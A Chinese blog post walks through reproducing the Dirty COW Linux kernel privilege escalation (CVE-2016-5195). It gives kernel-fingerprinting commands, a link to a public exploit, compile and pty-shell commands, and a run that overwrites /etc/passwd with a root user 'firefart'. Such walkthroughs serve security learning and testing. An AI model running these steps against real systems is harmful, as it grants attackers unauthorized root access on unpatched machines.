linux内核提权(脏牛CVE-2016-5195)

作者: migrate_ | 来源:发表于2020-04-24 17:04 被阅读0次

linux内核提权(脏牛CVE-2016-5195)
脏牛Linux本地提权漏洞复现(CVE-2016-5195)
Linux提权
Linux提权
CVE-2019-13272 Linux本地提权漏洞复现
网络安全-Day49-Linux提权常用命令和vi编辑器常用命令
安全Linux 内核提权漏洞分析
linux 提权-Crontab提权
linux 提权-SUID提权
linux 提权-sudo提权

漏洞范围：
Linux kernel >= 2.6.22（2007年发行，到2016年10月18日才修复）
查看版本信息

uname -a
uname -r
cat /etc/issue
cat /etc/*-release

1.jpg

在脏牛的影响范围内，直接上传脚本

https://github.com/FireFart/dirtycow

给脚本执行权限

chmod 777 dirty.c

编译脚本

#利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt

2.jpg

切换交互式shell

 python -c 'import pty;pty.spawn("/bin/sh")'

执行脚本

./dirty 123456  //(密码)

3.jpg

4.jpg

/etc/passwd 文件已经更改

firefart:123456  //用户名:密码
//利用之前最后做个备份  /etc/passwd

linux内核提权(脏牛CVE-2016-5195)
漏洞范围：Linux kernel >= 2.6.22（2007年发行，到2016年10月18日才修复）查看版本...
脏牛Linux本地提权漏洞复现(CVE-2016-5195)
漏洞范围： Linux kernel >= 2.6.22（2007年发行，到2016年10月18日才修复）危害：...
Linux提权
0x00 Linux提权基础命令 0x01 Linux提权工具 Linux内核CVE提权（github）：可能会导...
Linux提权
简单概述Linux的几种提权的办法。内核溢出提权 mysql udf提权上传库文件执行库文件创建命令执行函数...
CVE-2019-13272 Linux本地提权漏洞复现
0x01 相关信息漏洞类型：Linux本地提权漏洞影响范围：Linux内核版本低于5.1.17测试主机信息： E...
网络安全-Day49-Linux提权常用命令和vi编辑器常用命令
Linux提权常用命令基础信息收集： uname -a---打印所有可用的系统信息 uname -r---内核版...
安全Linux 内核提权漏洞分析
漏洞复现在ubuntu-20.04-LTS的虚拟机中进行测试, 内核版本号5.10.0-1008-oem, 在P...
linux 提权-Crontab提权
前言记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...
linux 提权-SUID提权
前言最近想着学习linux提权的一些姿势，这里简单分享学习SUID提权的一些知识点。权限解读先来父复习一下l...
linux 提权-sudo提权
前言最近听闻sudo刚刚出来了新漏洞，而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势...